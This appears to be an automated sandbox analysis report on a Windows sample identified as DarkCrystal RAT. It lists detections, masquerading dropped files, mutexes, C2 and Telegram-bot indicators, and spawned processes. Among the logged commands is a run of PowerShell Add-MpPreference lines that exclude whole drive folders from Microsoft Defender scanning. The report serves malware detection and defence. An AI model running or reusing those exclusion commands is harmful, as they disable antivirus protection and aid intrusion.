Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Avira: detection malicious, Label: TR/Spy.Agent.hwiyw
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Avira: detection malicious, Label: TR/Spy.Agent.hwiyw
Source: C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | ReversingLabs: Detection: 63%
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | ReversingLabs: Detection: 63%
Source: C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\HnmxfGsC.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\ynMPgItS.log | ReversingLabs: Detection: 29%
Source: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | ReversingLabs: Detection: 63%
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | Joe Sandbox ML: detected
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Joe Sandbox ML: detected
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.pdb | source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.pdb | source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49703 -> 80.211.144.156:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49710 -> 34.117.59.81:443
Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://ipinfo.io/country
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://ipinfo.io/ip
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Windows\en-US\3fcc2d96fa9fd9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Code function: 0_2_00007FFAACB20D78
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Code function: 0_2_00007FFAACF1954F
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\HnmxfGsC.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000000.1239602350.0000000000C4E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 0000004A.00000002.2281286314.0000000002841000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe1.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@79/114@0/0
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Users\user\Desktop\ynMPgItS.log
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NncqUjpY8lJtlqP3j9oF
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File created: C:\Users\user\AppData\Local\Temp\0sp3gwcw
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | File read: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
Source: unknown | Process created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
Source: unknown | Process created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"
Source: unknown | Process created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
